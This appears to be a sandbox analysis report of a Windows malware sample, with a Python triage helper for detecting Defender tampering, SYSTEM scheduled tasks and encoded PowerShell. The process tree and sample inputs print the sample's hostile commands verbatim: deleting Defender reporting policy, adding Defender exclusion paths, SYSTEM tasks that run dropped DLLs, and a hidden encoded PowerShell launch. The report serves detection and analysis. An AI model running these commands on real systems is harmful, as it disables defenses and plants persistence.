Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
  PID:5616

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 01:49:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll\",#1 /LPsite_idCBc 385118" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:876

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /run /I /tn "FTXCzbcEvROqagNdd"
  PID:2052

Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  PID:2000

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  PID:4492

Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  PID:2084

Level 3: C:\Windows\SysWOW64\reg.exe
  Command line: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  PID:5924

Level 2: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
  PID:5912

Level 1: C:\Windows\system32\rundll32.EXE
  Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 385118
  PID:440

Level 2: C:\Windows\SysWOW64\rundll32.exe
  Command line: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll",#1 /LPsite_idCBc 385118
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  PID:5280

Level 3: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
  PID:5116
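The process tree above is a compact record of the sample's defence-evasion and persistence commands: REG ADD of its own directories as value names under the policy-managed Defender exclusion key (written once for each registry view with /reg:32 and /reg:64), REG DELETE of the SpyNetReporting policy value, scheduled tasks created with /RU "SYSTEM" that run rundll32 on dropped DLLs, and a PowerShell -EncodedCommand whose payload is base64 of UTF-16LE text. The Python below is an added triage helper, not part of the sandbox report or of the sample: its input is a handful of command lines copied from the tree (constructed sample data), the tokenizer and the flag tables are assumptions that hold for these lines rather than a full cmd.exe argument parser, and the finding kinds are this example's own naming.

```python
import base64
import binascii
import re

# Constructed sample input: command lines copied from the process tree above.
ENCODED = ("cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAA"
           "SABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==")
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32',
    r'cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64',
    r'schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 01:49:00 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\tCAHvawg\rTZTDJv.dll\",#1 /LPsite_idCBc 385118" /V1 /F',
    'schtasks /CREATE /TN "gXmMMWGSr" /SC once /ST 00:54:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand ' + ENCODED + '"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand ' + ENCODED,
    r'"C:\Windows\system32\gpupdate.exe" /force',
]

# Whitespace-separated tokens honouring "..." and the \" escape used inside schtasks /TR.
# Assumption: good enough for these lines, not a full cmd.exe parser.
_TOKEN = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')

def tokenize(cmdline):
    out = []
    for m in _TOKEN.finditer(cmdline):
        quoted, bare = m.group(1), m.group(2)
        out.append(quoted.replace('\\"', '"') if quoted is not None else bare)
    return out

def _tool_index(tokens, names):
    # Index of the first token whose file name (case-insensitive) is one of names.
    for i, tok in enumerate(tokens):
        if tok.replace('/', '\\').rsplit('\\', 1)[-1].lower() in names:
            return i
    return None

def parse_reg(tokens):
    """reg.exe ADD/DELETE -> {'op', 'key', 'value', 'view'}; view is '32', '64' or None."""
    i = _tool_index(tokens, ('reg', 'reg.exe'))
    if i is None or len(tokens) < i + 3 or tokens[i + 1].upper() not in ('ADD', 'DELETE'):
        return None
    info = {'op': tokens[i + 1].upper(), 'key': tokens[i + 2], 'value': None, 'view': None}
    rest, j = tokens[i + 3:], 0
    while j < len(rest):
        flag = rest[j].lower()
        if flag in ('/v', '/t', '/d') and j + 1 < len(rest):  # flags that take a value
            if flag == '/v':
                info['value'] = rest[j + 1]
            j += 2
        else:
            if flag.startswith('/reg:'):
                info['view'] = flag[5:]
            j += 1
    return info

_TASK_VALUE_FLAGS = ('/tn', '/ru', '/rp', '/tr', '/sc', '/st', '/sd', '/mo', '/xml', '/s', '/u', '/p')
_TASK_ACTIONS = ('/create', '/run', '/delete', '/end', '/query', '/change')

def parse_schtasks(tokens):
    # schtasks.exe -> {'action': 'CREATE' | ..., plus lower-cased flag names -> values}
    i = _tool_index(tokens, ('schtasks', 'schtasks.exe'))
    if i is None:
        return None
    info, rest, j = {'action': None}, tokens[i + 1:], 0
    while j < len(rest):
        flag = rest[j].lower()
        if flag in _TASK_VALUE_FLAGS and j + 1 < len(rest):
            info[flag[1:]] = rest[j + 1]
            j += 2
        else:
            if flag in _TASK_ACTIONS:
                info['action'] = flag[1:].upper()
            j += 1
    return info

def decode_encoded_command(tokens):
    """powershell -EncodedCommand (any prefix such as -e, -ec, -enc) carries base64 of UTF-16LE."""
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if flag.startswith('-') and len(flag) > 1 and 'encodedcommand'.startswith(flag[1:]):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode('utf-16-le').rstrip('\x00')
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None

def triage(cmdlines):
    """Return a list of (kind, detail, context) findings from one pass over the command lines."""
    findings = []
    for line in cmdlines:
        toks = tokenize(line)
        reg = parse_reg(toks)
        if reg is not None:
            key = reg['key'].lower()
            if reg['op'] == 'ADD' and '\\windows defender\\exclusions\\' in key:
                findings.append(('defender_exclusion_added', reg['value'], reg['view']))
            elif reg['op'] == 'DELETE' and '\\windows defender\\' in key:
                leaf = reg['key'].rsplit('\\', 1)[-1]
                findings.append(('defender_policy_removed', leaf + '\\' + (reg['value'] or ''), reg['view']))
            continue
        task = parse_schtasks(toks)
        if task is not None:
            if task['action'] == 'CREATE' and (task.get('ru') or '').upper() == 'SYSTEM':
                findings.append(('system_task_created', task.get('tn'), task.get('tr') or task.get('xml')))
            decoded = decode_encoded_command(tokenize(task.get('tr') or ''))  # payload hidden in /TR
            if decoded:
                findings.append(('encoded_powershell', decoded, 'task ' + str(task.get('tn'))))
            continue
        decoded = decode_encoded_command(toks)
        if decoded:
            findings.append(('encoded_powershell', decoded, None))
    return findings
```

Run `triage(SAMPLE_CMDLINES)` and the encoded task payload decodes to the same `start-process -WindowStyle Hidden gpupdate.exe /force` that the powershell.EXE process later executes directly; the exclusion findings carry the registry view, which matters here because the sample writes each path twice, so a hunt that only reads one view would still see it.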
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Scheduled Task/Job (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Scheduled Task/Job (1)
Defense Evasion
  Impair Defenses (1)
    Disable or Modify System Firewall (1)
  Modify Registry (3)
  Subvert Trust Controls (1)
    Install Root Certificate (1)
  Virtualization/Sandbox Evasion (1)
Downloads

- Filesize 384KB
  MD5 02cee518ef7a6090e03aef118f7e3214
  SHA1 3c2cc060c629f4cf97b13df0ff4491ec858d2667
  SHA256 7881f16a0d87799fa09d71c25346aff7f10517b44858ac14521a9c62e43a9b4e
  SHA512 ade7cdf54a3869069d9f5c74976ab470733924b34f2946996fdb9db843d188ba2490dbd25becc7c6b324dc7acc6f96fd980e5d47027890c1d6a0161306b5cac5

- Filesize 11KB
  MD5 a33e5b189842c5867f46566bdbf7a095
  SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
  SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
  SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

- Filesize 128KB
  MD5 a47c9a22d04f7a89ffb338ec0d9163f2
  SHA1 c779b4e0bd380889d053a5a2e64fac7e5c9f0d85
  SHA256 c67b8f01d1b007cf0abea4f89d1272a146116b398d97c0873889e4f3bc1aa2a5
  SHA512 64ebbee2f2f0884096e5b0996b30adae289549ba24f19fb3858f638148f358cd9a6f2fb370c0b2a44e821cb00b5a49468f849c97e9aa8ee413bbae11b57d72f4

- Filesize 154KB
  MD5 920a163c866396f3f3e8e7c5167e09c4
  SHA1 e7c862b9acecbab1a3480b90726ad05ee22d13af
  SHA256 7fb2143ccf49e48006d60a7b1607d4a421b6c120ae1a25d820518f810ea223dd
  SHA512 c26102f8cd342029e8de7a789d1740126012e5c7700ece3178a0bffc80282fb2698a728d1c9846d0b0c3a9a498f0cfec939394194d23027ace610fd3aa0138ea

- Filesize 65KB
  MD5 cc27665491f5bc1e20adadbbd4cd6999
  SHA1 1a01f7715f366269d58e0cd994f44beb8688d1a3
  SHA256 fa26987a3f6d30a23c8fa57800ce2dde7f440be1ab66e57a2611e9e239599ad5
  SHA512 4a6d7e94a70037aeca23562e5285f106c018081a7c4f7b765e109bf09c70361f292e09cca1075a3fb499cde7a0cf338abc87f93a931ec14f5599dd961cb1f8a0

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
  Filesize 187B
  MD5 2a1e12a4811892d95962998e184399d8
  SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
  Filesize 136B
  MD5 238d2612f510ea51d0d3eaa09e7136b1
  SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
  Filesize 150B
  MD5 0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1 6a51537cef82143d3d768759b21598542d683904
  SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

- Filesize 10KB
  MD5 85a0f93ea503b31a86f73a9e18338a8f
  SHA1 c90e0392dbef35d28360f2f6775523a2a601b73c
  SHA256 44904d113f31e65946b3df2901348b9a3844e4ef347dd66d63fc68141da48115
  SHA512 6ee3e40cbda78b721ec2c39c8d81edcec60ecc2f6ad238b4e5501f6b4f3fb0f01e0cc00b4444677d7c6db0c7bf4e20098e80ef563b62cdea9bded6bfe93d6013

- Filesize 34KB
  MD5 5be4bcea71a53e213d346a603bd3bfac
  SHA1 4f103d1fa1ca9bfa82a08f9128b05db8cd52b1c6
  SHA256 d597731b02d59bda87c7196999dde832494e03e1488396387399a0ca911f9bc7
  SHA512 2dd0234289d76a6e313b170f89dc40d7989623d4da742898018cbf8fbce946feec2209465e8cd985d56f729490bcc978e17078f6f0b22af14526114e77bee56c

- Filesize 2KB
  MD5 a6ea7bfcd3aac150c0caef765cb52281
  SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
  SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
  SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
  Filesize 151B
  MD5 bd6b60b18aee6aaeb83b35c68fb48d88
  SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
  SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
  SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

- Filesize 9KB
  MD5 03e015f325b17e6fd9c389f7d87442af
  SHA1 a51d6cf13a9a06c17e0ad6eb12f50c6d2b467244
  SHA256 b63bc97c5a9e854c8e8baa68eaebda2a5c3f5fff3c328c5ea486e2444af9c013
  SHA512 4ca72e6c8e0ea391aabd14f4bd76f771e9230ed390226ecd96649f65d21bc263a03731f90136ead2173e0568a927899c83b58a1dfc92cce54877aefde2900129

- Filesize 21KB
  MD5 a59b3ffca1fd691fd8b26daa1700afe1
  SHA1 4c49a7e7d64a518000e9fdf96dc74f081240c993
  SHA256 54d1173d12495fb4d272889964e7df76a497fc782523be11898d318ded68d9ed
  SHA512 85c5ffe343e3e34362d878de5886cacf2a7a67e867af003a035efff6acc17a17a4bf42d3b62ee367e599041bdfc3773ace2d8c533d4bf7c38000fd50c0125bb2
- Filesize 806KB
  MD5 1f3b04e40f5fb499c11f2e8614021638
  SHA1 825dace5c4e3be079696bc141dabeb46b5ca02ef
  SHA256 cc04dacc655c5178b533c6b352085a7ec8b783f1d5ecb87362c061046d9453b7
  SHA512 bc966c6389a905513f07eb5a54080ea4256b7ce703bdcd1e097672c2c4aa87a7444d5911b45973c2e3d9d59cefa94e1ae214b691a071c52f98e8db2961f6078c

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\additional_file0.tmp
  Filesize 1.0MB
  MD5 5e134d772073b5ac5113d0b4ae31c0f6
  SHA1 6040526963f03ba01153a9aefaa6a1a5b0c18703
  SHA256 124866911e021e913521d8d72d41fffc2ae94012f962d930bd347fd56d5a763f
  SHA512 55b81f9f9de89be2c650abf31f418c57bb5e1e1e898168dd80a25ca2ea9ecbbe0677652037e953c6ce227227893ce9ab4666dfab36016ff56774219f79f99008

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
  Filesize 957KB
  MD5 3f32bcd03970abf1bf87a9367df6e6a6
  SHA1 bf4819355b3444883883014dd6a908309d367c09
  SHA256 6714337224a71f3d254e6cfb2774613af27c5ca5e029cb25b055ad4b972a5f20
  SHA512 d1192c5a96bcca8ab1643c12e8a8b635f919f8eed1e5fb294693ce1d6163ad8cac525b48744acfacc121ad50bb5f2ff0487f3653a6021dca3ac71a066faabd61

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
  Filesize 1.0MB
  MD5 15f1ac80584efd91a1d07f3cc32036c7
  SHA1 fb073862ad0f2964312f4eb3cb861bd99661b9e2
  SHA256 befe3e4a093b77c47036770d6f32aeab6ad6db5c06ffa8544c6be9bb4789aee6
  SHA512 88b8a04fe9b6876f71bc2ebe5797f275a2e77666634115a628484a684dbf98cb40e4256656f5d85a0843ffa431b0e1b49f9fdb99c46f754bcd4bb8d6b006271c

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
  Filesize 1.7MB
  MD5 8fa2408d910be9dce6f9858022150406
  SHA1 03dc0edc485333c3717cd58bae04098a583cf736
  SHA256 098230832f445dfefd5c5a3e5265e14dc1b8256463956dcf663119f2f684be9b
  SHA512 3f4360560921dd0a9b40c720593a09bc896381bd90c2c42f16c5117d27d03dca1b113d4089707d6e2fed93c4cec65bed24dcbae838399fd24957b6da95230359

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
  Filesize 1.2MB
  MD5 6c6af30fc8c72df4054836835cdcc2b9
  SHA1 a4178dde02ba2fe7200394363f8295e30cbe7f0e
  SHA256 e59b794d2a8a95ce735116ff5c7ab7c490ef25bdac66bbe0325da015183cf4d4
  SHA512 37384582b8cf545bb7f1304fcc9abddc12b21aff6f5ec36163bee7c485a4ae585f64589cef7e07a397d3f04e491497a119ea5fbce71aeeb22b92093fae886a67

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbgcore.dll
  Filesize 166KB
  MD5 8b6f64e5d3a608b434079e50a1277913
  SHA1 03f431fabf1c99a48b449099455c1575893d9f32
  SHA256 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
  SHA512 c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
  Filesize 1.6MB
  MD5 86aae03168dc5769d0bb2a6c678c3f9f
  SHA1 b303ea8334145c03ef9449dcc13fff7e5ad7e23e
  SHA256 2de5ddb62d5f1a1ae0a3873365cda0dd391f1b9560c2759d7c349b0a22dca907
  SHA512 0ca8e79ec66c8141f3690e0a7d1554f0be8cbbafec12c5ed85a5b95cfed5288ec79affbca044a5c097354a233067a495dd6758e98fda0f573fd57f8c3c171515

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
  Filesize 1.7MB
  MD5 925ea07f594d3fce3f73ede370d92ef7
  SHA1 f67ea921368c288a9d3728158c3f80213d89d7c2
  SHA256 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
  SHA512 a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
  Filesize 1.4MB
  MD5 14f3dacbc42e9fa889a042c94dfbaf6b
  SHA1 cb00b215ed3ca23d61bd365c5a3fa80d0d64dc23
  SHA256 6aea23c8b5474adcc0051455b11ef1dc71fe40e8fc3f427936107d7091281f56
  SHA512 b80799c3eb6f40d93b8633484421e8d2f3cf36a9656730db955d4c398374278a2b7fe146b6018c76137fc1174a2df617adf52083de157dd997b122ced4434198

- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\opera_package
  Filesize 2.2MB
  MD5 76c7a0520803d8b5f8498a680cc7f6e9
  SHA1 8d25f6bcee148c9f63cea17e1c3dcc61c08165bc
  SHA256 f5bf542621626f7edee65802297ce1980c8f30077407195d441fef652e9ca57c
  SHA512 efa80db2af34d26e3f0a2f240318b0ead55de62752ab159e5aa6564b3e5fc5b5ad962cc64d1a3114df22489532c80c45695e927dd3b75ecce899580f3a58eb31

- Filesize 244KB
  MD5 75e0fc12564702e9f5fdc6b2b28d9699
  SHA1 d3e7534b6eb77f6c0c64f78388b6f7af03e1aea8
  SHA256 853cdd1f3941e0936deff87b6c66521cfadb4d2349a5e6bd54f8e4ca3cb85d5e
  SHA512 e9d03b353ac85acb087d6bd1f2fb96bdbe60184d554a0c7fd5f9d1ed446e1cddaf028dcaa30c66b8c148442733eab5c7d51292c87ca3138a8b323a84326ccd5c

- Filesize 288KB
  MD5 0efdaaa1f0da61ea61631e2739824d84
  SHA1 ebb4510cd8f1a31d0de70f46e6383a57f01b432c
  SHA256 6206911fa12a8ec32853b8a2d2902ab209b3c5af39524a3d5b58e3c04c231a45
  SHA512 3cc9b56efed1ae4bf73ea13cecf5b01c1dbdfa399e5000224a11bc840da5d9b182ab2b9730096ef08a577189c0b153f766587b6a21d374da48cee3c00c8fd692

- Filesize 492KB
  MD5 08c3804119dc8c32d35e4629f58705f3
  SHA1 cd0221b2b7a4136537058b927c0ef9dcf4c6c108
  SHA256 4deafc42fa8e41c3ed133b95f5939709b6c6c5e5a88b3bbf62fabbbefa10ee85
  SHA512 64cf16c1b7b52f781b2935a24b646951fd07ca15b673b98cc4cf1b0f98d459f344911d097e67f08154d5dfc5b263b6d5eb4185e4ecc324057471f4caeaf2bed7
- Filesize 1.8MB
  MD5 9745f15b1ccda65431f798011b425fd2
  SHA1 8c4bdf8ccb4a705a44fe527f33e12b3bb77d0bd3
  SHA256 258c80812964abd0d22a1155986aead1642119ed81c0f5651b153264fa3a026c
  SHA512 f1c2bb899261955f59ea79725ff93a87269aea3acbb3c876908b6651cbe059cebef511b10e003479b17737da0cc0ebf98008b9a6fcaefce7ef76bb98477489ae

- Filesize 1.5MB
  MD5 cfeca63a79c7dc19ac09534eecc44e1b
  SHA1 121c4aa1dd6eaf5e200274c6b259337a8540e6a1
  SHA256 f83efaf05cf22e4e5eb417db33e2c00423a2b7807af5439f136ffdf16cb6c3a3
  SHA512 9ba26eb801c4031505999c1a7ca074e71ba9f534050de82d4250973a598ca0888c83b6d0d6aa73e84ca0bd2804a6bb6dff603a4973225cb907dfb819338eeaa1

- Filesize 959KB
  MD5 1148b375036c5a094b0d25842adc6fae
  SHA1 f8f531ea1fbdec43e078f4d0c02edb7b6d21125b
  SHA256 f0a7339abbc424ff0311937c5c8b3cb7ed9cf4dba3d291f0c2c04830edb4e793
  SHA512 19ea815cdea57f90763d52c5c26651fc288ca6a6ac71eadec5572626a17a6617d1bbeccc5c2e8c8d60baff08f8ab315dee1234cc0da5bd289f49f5277897381b

- Filesize 801KB
  MD5 920c89e0442e21cf4c2f0d41f64edc6f
  SHA1 d26d574b9d3c4cba2b3d3c373a28dfb6a0fd0b41
  SHA256 95a27cde42a451f381eeadda982df467aa6248c51e94f9db97baae33c981cc14
  SHA512 3a3db6dfffd84664feffa5d400232fd192428a41b905f8440c43eb011930dc12a64ebd85d2661c0d79c07befa7143c43c6791d444dfbbdd17a2ca22e5bb0cdab

- Filesize 919KB
  MD5 7d44c7fb1a0c82a73260ac3bf6a69f56
  SHA1 ed0a08ba5549df4b3b4728f97ee9b8b97f5c8f82
  SHA256 d410e97651b37660c9334ac7aa7a9328c467cc9a7f4236aae5947c49212480cb
  SHA512 93e382bde26c704d38de86a390e427717e52e1496972c2bbbb05359950de6c987a256581872f557a707215a66f65ca1dd88392df2c3fa9eba1ec0fc22bb55b4f

- Filesize 106KB
  MD5 fe380780b5c35bd6d54541791151c2be
  SHA1 7fe3a583cf91474c733f85cebf3c857682e269e1
  SHA256 b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
  SHA512 ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

- Filesize 990KB
  MD5 78563885a35378f8a5e28245ac6b5655
  SHA1 d2daf2b443e2b9d741dc1c25a4c9a4ea7bc80377
  SHA256 1aebac12c57a04b002b64010ef79592800f11b7f44169661f1810395d8af19f8
  SHA512 9bba90d66d8ab251a09bec3a741881bfe71628b75cc3bfa30dce75c271f7a78776d517cd143eab1dfc7a9fa9d00e96060694232aba529099ee3a1039d701a2d5

- Filesize 889KB
  MD5 0383349b0cf62040d542648c2ba17e54
  SHA1 6da93c8b78bc83dc51bf20f15083ea13739fab60
  SHA256 5b65100460cb061cdaa3ec58c3dacb8b0552b64d858e6201824d1bdd34e8fded
  SHA512 452a5c0f56f4d348eca486cc42e2439cac566e8ff38b6cd07ecb15c7c113116d96ee54bb14c9a6a317cc0548dc39b2fdec0df4afd79415a1c12a41cf4ded9762

- Filesize 832KB
  MD5 c97c03f4fca1a551ae69d3e0806f3ac5
  SHA1 0df967567641e9d9575b6f635d2c5c0e0eb23bd3
  SHA256 d1f8caaa0d6646422ebd6873f4df22fafac71ddee343ca67e4275da1188f35ff
  SHA512 24dd83555a97a64e95aa89f1380fdf13bc585de7b5ffddeb0233de6a593fa54491a25f07ebdd18577e6999f626a5f114f6e05c07f95a1792c6db51ba626d6443

- Filesize 873KB
  MD5 107fed20dcb45203bac9bb44544490a3
  SHA1 88c33eadda5f445593096e04918e89cf3113ac78
  SHA256 c22f18fda7df557a110d0749521d7376d666cbb0ce39aac05498d41d359072cb
  SHA512 715f87a3e6a1a99ade452bbf9ae914bff77bd6cd9b3e1ba42ecc2c13970a28a65c8536e407c18e2135488b67bbbbf08efcda213ab798ea5d6ec6124870964c94

- Filesize 712KB
  MD5 abd8e708cf78c7276610d41a858b16ab
  SHA1 b7bad5f17bde8af5aed95f277e92e4eba06c2e90
  SHA256 cc511e299ea62fc8128a8586c1894c1f03382cb602281482759ec627147d598c
  SHA512 5aff64ec8dd653497b5f8dde5a6797255bd56c62e3a3dc98e5b5f391104a42d034691518960f1a55c7d96c953fef36e6ec3b4e411cb70d4b6a670d6443d92a00

- Filesize 536KB
  MD5 c068b3d93df4f27a14c291b53e21a421
  SHA1 ba907b6e3a52a77093e903a5cf7a748f01e58717
  SHA256 903e4f28e3bcf5cfb3b24ed2989fd321799644eab2314c60e8e05ba6ab55d5ce
  SHA512 f84544ef7e8fc7c95993975036b8851a0b0e8cc41da259dd8135de9686359760aa55d5b34bd61ef047b855d1f306a10b77af76b7d6b952d827a165990a804316

- Filesize 60B
  MD5 d17fe0a3f47be24a6453e9ef58c94641
  SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- Filesize 233KB
  MD5 d6f7a547f0161592665e5f835a1299e0
  SHA1 2d1954be78fa93efa9b7539b0b111daa9c3bfcc2
  SHA256 f92ff36a1b7765fba64b4e4e407b1c42a1175a10fe254ec86b6a313342c7a331
  SHA512 0d0a4d79203cf33dae88d43bd04dbc2380e7ea5354b9ccadab8fc3c267487696e83011f91715036c056bc70f482e65e87a6c25d7659955642b54c2db95ef0d68
- Filesize 810KB
  MD5 1a65099a61efd85aeefa5a3143485dc6
  SHA1 652e65e9b27ebbfee8d609fe971524415b6b4291
  SHA256 f1bc98e75961217029fe4e5eeb9e2096bba760d552925ddff9cd7c696cf97f21
  SHA512 e9736afe7b4136c0941c5aa3682bdc54be8bee5e9c55cab91ff1117abcfdc5d8c39d52dfd46817f78e11121da763b00a201a9f66c131118a72103c1068e5fe7b

- Filesize 453KB
  MD5 e61ef1131bfbeaf6277a41d5e5401395
  SHA1 ff74f12ef26a3b01fa360603f9ce6b764fc22961
  SHA256 4364c2282106359f2b052018f56181e1f29cbd828a4a85c6b8a20da23113bad0
  SHA512 f963326fa0f453e14738e607c8bab161b28f1082ab5124a1bdcc2ec5eff8591ecb2d89622b2233d2fdec9bf65ea07b8ac20d491e8cf40330470b0ea36a8f85bf

- Filesize 6KB
  MD5 f71925823078c6e61ccbf92c65516186
  SHA1 c3403bd7858ec535855305f2fd0d4d0607a827b7
  SHA256 b063a62a0f8beb00d9518b3c5b591d754c2bcd4f5e99aecc9f560d172ba90091
  SHA512 1b7b0b3c0aa0933b3fa40fa95b51c902169dfaf3667dd94bf081cad0325fa13ce8b18cd354cac6e1102137d55ade970d10c65a2f0720a414f8261beddb8219f5

- Filesize 40B
  MD5 bffd4cbd6f377419620584c2d7c73507
